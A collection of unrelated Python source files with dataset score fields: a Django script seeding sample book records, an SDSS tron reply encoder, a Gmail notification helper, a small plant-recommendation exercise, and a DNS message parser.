@transaction.atomic
def populate_books():
print("Adding books...")
books = [
models.Book(
id=1,
title="Fahrenheit 451",
description = ("Fahrenheit 451 is a 1953 dystopian novel by American writer <NAME>."
"Often regarded as one of his best works, the novel presents a future American society where"
"books are outlawed and firemen burn any that are found."),
isbn="9780006546061",
pub_date=datetime(2019, 2, 7),
author=models.Author.objects.get(id=2),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=2,
title="I, Robot",
description=("I, Robot is a fixup novel of science fiction short stories or essays by"
"American writer <NAME>. The stories originally appeared in the American magazines"
"Super Science Stories and Astounding Science Fiction between 1940 and 1950 and were"
"then compiled into a book for stand-alone publication by Gnome Press in 1950, in an"
"initial edition of 5,000 copies."),
isbn="9780007491513",
pub_date=datetime(2013, 4, 1),
author=models.Author.objects.get(id=3),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=3,
title="Foundation and Empire",
description=("Foundation and Empire is a science fiction novel by American writer <NAME>"
"originally published by Gnome Press in 1952. It is the second book in the Foundation Series,"
"and the fourth in the in-universe chronology."),
isbn="9780553293371",
pub_date=datetime(1997, 4, 1),
author=models.Author.objects.get(id=3),
publisher=models.Publisher.objects.get(id=2)
),
models.Book(
id=4,
title="Foundation And Earth",
description=("Foundation and Earth is a science fiction novel by American writer <NAME>,"
"the fifth novel of the Foundation series and chronologically the last in the series."
"It was published in 1986, four years after the first sequel to the Foundation trilogy,"
"which is titled Foundation's Edge."),
isbn="9780553587579",
pub_date=datetime(2004, 12, 15),
author=models.Author.objects.get(id=3),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=5,
title="Do Androids Dream Of Electric Sheep?",
description=("Do Androids Dream of Electric Sheep? (retitled Blade Runner: Do Androids Dream"
"of Electric Sheep? in some later printings) is a dystopian science fiction novel by American"
"writer <NAME>, first published in 1968."),
isbn="9780575094185",
pub_date=datetime(2017, 11, 20),
author=models.Author.objects.get(id=4),
publisher=models.Publisher.objects.get(id=4)
),
models.Book(
id=6,
title="1984",
description=("Nineteen Eighty-Four: A Novel, often published as 1984, is a dystopian social"
"science fiction novel by English novelist <NAME>. It was published on 8 June 1949"
"by <NAME> as Orwell's ninth and final book completed in his lifetime."),
isbn="9780141036144",
pub_date=datetime(2008, 10, 1),
author=models.Author.objects.get(id=5),
publisher=models.Publisher.objects.get(id=5)
),
models.Book(
id=7,
title="Animal Farm",
description=("Animal Farm is an allegorical novella by <NAME>, first published in"
"England on 17 August 1945. The book tells the story of a group of farm animals who rebel"
"against their human farmer, hoping to create a society where the animals can be equal,"
"free, and happy."),
isbn="9780141036137",
pub_date=datetime(2008, 10, 1),
author=models.Author.objects.get(id=5),
publisher=models.Publisher.objects.get(id=5)
),
models.Book(
id = 8,
title="Cat's Cradle",
description=("Cat's Cradle is a satirical postmodern novel, with science fiction elements,"
"by American writer <NAME>. Vonnegut's fourth novel, it was first published in 1963,"
"exploring and satirizing issues of science, technology, the purpose of religion,"
"and the arms race, often through the use of black humor."),
isbn="9780241951606",
pub_date=datetime(2011, 4, 7),
author=models.Author.objects.get(id=1),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=9,
title="Mother Night",
description=("Mother Night is a novel by American author <NAME>, first published"
"in February 1962. The title of the book is taken from Goethe's Faust. The novel takes the"
"form of the fictional memoirs of Howard <NAME> Jr., an American, who moved to Germany"
"in 1923 at age 11, and later became a well-known playwright and Nazi propagandist."),
isbn="9780099819301",
pub_date=datetime(2019, 3, 5),
author=models.Author.objects.get(id=1),
publisher=models.Publisher.objects.get(id=4)
)
]
models.Book.objects.bulk_create(books)
def run():
try:
populate_authors()
populate_publishers()
populate_books()
except Exception as e:
print(e)
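# Illustrative invocation (an assumption based on the scripts/ layout and the run() entry
# point convention of django-extensions): python manage.py runscript populate_db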
| 1.578125 | 2 |
tron/Hub/Reply/Encoders/RawReplyEncoder.py | sdss/tron | 0 | 50692 | <reponame>sdss/tron
__all__ = ['RawReplyEncoder']
from tron import Misc
from tron.Hub.KV.KVDict import kvAsASCII
from tron.Parsing.dequote import dequote
from .ReplyEncoder import ReplyEncoder
class RawReplyEncoder(ReplyEncoder):
""" Encode Replys without any protocol information.
Options:
EOL - choose the EOL string to use.
keyName - set a single keyword, whose _value_ alone will be returned.
"""
def __init__(self, **argv):
ReplyEncoder.__init__(self, **argv)
# How do we terminate encoded lines?
#
self.EOL = argv.get('EOL', '\n')
self.keyName = argv.get('keyName', None)
def encode(self, r, nub, noKeys=False):
""" Encode a protocol-free reply for a given nub. """
if self.keyName:
rawVal = r.KVs.get(self.keyName, '')
val = dequote(rawVal)
Misc.log('RAWDEQUOTE', 'rawVal=%r val=%r' % (rawVal, val))
else:
val = self.encodeKeys(r.src, r.KVs)
if val:
return '%s%s' % (val, self.EOL)
else:
return ''
def encodeKeys(self, src, KVs):
""" Return a string encoding of KVs stored in an OrderedDict.
Args:
src - ignored
KVs - an OrderedDict of values. See Parsing/parsing.py for important details.
Notes:
"""
if self.debug > 5:
Misc.log('ASCIIReplyEnc.encode', 'encoding %r' % (KVs, ))
if KVs is None:
return ''
keylist = []
for k, v in KVs.items():
if self.debug > 5:
Misc.log('ASCIIReplyEnc.encode', 'encoding %r=%r' % (k, v))
keylist.append(kvAsASCII(k, v))
return '; '.join(keylist)
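    # Illustrative behaviour sketch (not part of the original module):
    #   enc = RawReplyEncoder(keyName='text', EOL='\n')
    # encoding a Reply whose KVs contain text="hello world" yields "hello world\n";
    # without keyName, all keywords are joined as key=value pairs (via kvAsASCII),
    # separated by '; '.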
| 1.484375 | 1 |
sendemail.py | mesperrus/grailed-notifications | 0 | 50820 | # login.txt should contain address on first line and app specific password on the second
#
# <EMAIL>
# <PASSWORD>
def sendEmail(subject, message_):
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
with open("login.txt") as f:
login = f.read().splitlines()
gmailUser = login[0]
gmailPassword = login[1]
recipient = login[0]
message = message_
msg = MIMEMultipart()
msg['From'] = gmailUser
msg['To'] = recipient
msg['Subject'] = subject
msg.attach(MIMEText(message))
mailServer = smtplib.SMTP('smtp.gmail.com', 587)
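    # Port 587 is Gmail's STARTTLS submission port; the starttls() call below upgrades the connection.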
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(gmailUser, gmailPassword)
mailServer.sendmail(gmailUser, recipient, msg.as_string())
mailServer.close() | 1.835938 | 2 |
Linkedin/linkedin-become-a-programmer-foundations/2.programming-foundations-beyond-the-fundamentals/Ch07/07_07/plant.py | mohammedelzanaty/myRoad2BeFullStack | 2 | 50948 | <reponame>mohammedelzanaty/myRoad2BeFullStack
def plant_recommendation(care):
if care == 'low':
print('aloe')
elif care == 'medium':
print('pothos')
elif care == 'high':
print('orchid')
plant_recommendation('low')
plant_recommendation('medium')
plant_recommendation('high')
| 2.1875 | 2 |
dns_messages/dns_objects/dns_message_parser.py | wahlflo/dns-messages | 0 | 51076 | <gh_stars>0
from dns_messages.dns_objects import *
from ..dns_objects.dns_message import DnsMessage, OPCODE, RCODE
from ..utilities import convert_bytes_to_bit_list, extract_int_from_raw_bits, parse_name
RR_TYPE_TO_CLASS_MAPPING = {
RRType.A: A,
RRType.NS: None,
RRType.CNAME: CNAME,
RRType.SOA: SOA,
RRType.PTR: PTR,
RRType.HINFO: HINFO,
RRType.MX: MX,
RRType.TXT: TXT,
RRType.RP: None,
RRType.AFSDB: None,
RRType.SIG: None,
RRType.KEY: None,
RRType.AAAA: AAAA,
RRType.LOC: None,
RRType.SRV: None,
RRType.NAPTR: None,
RRType.KK: None,
RRType.CERT: None,
RRType.DNAME: None,
RRType.APL: None,
RRType.DS: None,
RRType.SSHFP: None,
RRType.IPSECKEY: None,
RRType.RRSIG: None,
RRType.NSEC: None,
RRType.DNSKEY: None,
RRType.DHCID: None,
RRType.NSEC3: None,
RRType.NSEC3PARAM: None,
RRType.TLSA: None,
RRType.SMIMEA: None,
RRType.HIP: None,
RRType.CDS: None,
RRType.CDNSKEY: None,
RRType.OPENPGPKEY: None,
RRType.CSYNC: None,
RRType.ZONEMD: None,
RRType.SVCB: None,
RRType.HTTPS: None,
RRType.EUI48: None,
RRType.EUI64: None,
RRType.TKEY: None,
RRType.TSIG: None,
RRType.URI: None,
RRType.CAA: None,
RRType.TA: None,
RRType.DLV: None,
}
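# RR types mapped to None above have no dedicated record class yet; _parse_resource_record
# falls back to UnparsedResourceRecord (keeping the raw RDATA bytes) for them.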
class DnsMessageParser:
def __init__(self, message: bytes):
self._message_in_bytes = message
self._message_in_bits = convert_bytes_to_bit_list(message=message)
self._qd_count = 0
self._an_count = 0
self._ns_count = 0
self._ar_count = 0
self._byte_index = 12
self._parsed_message: DnsMessage = None
def parse_message(self) -> DnsMessage:
self._parsed_message: DnsMessage = self._parse_message_header()
self._parse_question_section()
self._parse_answer_section()
self._parse_authority_section()
self._parse_additional_section()
return self._parsed_message
def _parse_message_header(self) -> DnsMessage:
message_id: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, bit_offset=0, number_of_bits=16)
qr: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=0, number_of_bits=1)
op_code: OPCODE = OPCODE.from_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=1)
aa: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=5, number_of_bits=1)
tc: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=6, number_of_bits=1)
rd: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=7, number_of_bits=1)
ra: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=8, number_of_bits=1)
z: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=9, number_of_bits=3)
rcode: RCODE = RCODE.from_bits(raw_bits=self._message_in_bits, byte_offset=3, bit_offset=2)
self._qd_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=4, bit_offset=0, number_of_bits=16)
self._an_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=6, bit_offset=0, number_of_bits=16)
self._ns_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=8, bit_offset=0, number_of_bits=16)
self._ar_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=10, bit_offset=0, number_of_bits=16)
return DnsMessage(message_id=message_id, qr=qr, op_code=op_code, aa=aa, tc=tc, rd=rd, ra=ra, z=z, rcode=rcode)
def _parse_question_section(self) -> None:
for _ in range(self._qd_count):
self._byte_index, parsed_question = Question.from_bytes(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_offset=self._byte_index)
self._parsed_message.questions.append(parsed_question)
def _parse_answer_section(self) -> None:
for _ in range(self._an_count):
parsed_rr = self._parse_resource_record()
self._parsed_message.answers_RRs.append(parsed_rr)
def _parse_authority_section(self) -> None:
for _ in range(self._ns_count):
parsed_rr = self._parse_resource_record()
self._parsed_message.authority_RRs.append(parsed_rr)
def _parse_additional_section(self) -> None:
for _ in range(self._ar_count):
parsed_rr = self._parse_resource_record()
self._parsed_message.additional_RRs.append(parsed_rr)
def _parse_resource_record(self) -> ResourceRecord:
# parse name of the resource record
self._byte_index, rr_name = parse_name(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_index=self._byte_index)
self._byte_index, rr_type = RRType.from_bytes(raw_bits=self._message_in_bits, byte_offset=self._byte_index)
self._byte_index, rr_class = RRClass.from_bytes(raw_bits=self._message_in_bits, byte_offset=self._byte_index)
# parse the time to live of the resource record
rr_ttl = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=self._byte_index, bit_offset=0, number_of_bits=32)
self._byte_index += 4
# parse the data of the resource record
rr_data_length = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=self._byte_index, bit_offset=0, number_of_bits=16)
self._byte_index += 2
record_class = RR_TYPE_TO_CLASS_MAPPING.get(rr_type, None)
if record_class is None:
raw_data = self._message_in_bytes[self._byte_index: self._byte_index + rr_data_length]
record = UnparsedResourceRecord(name=rr_name, rr_class=rr_class, ttl=rr_ttl, rr_type=rr_type, raw_data=raw_data)
else:
record = record_class.from_bytes(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_offset=self._byte_index,
rr_data_length=rr_data_length, name=rr_name, rr_class=rr_class, ttl=rr_ttl)
self._byte_index += rr_data_length
return record
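    # Illustrative usage (not part of the original module): `payload` would be the raw
    # bytes of a DNS message, e.g. a datagram read from a UDP socket on port 53.
    #   message = DnsMessageParser(payload).parse_message()
    #   message.questions, message.answers_RRs, message.authority_RRs, message.additional_RRs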
| 1.4375 | 1 |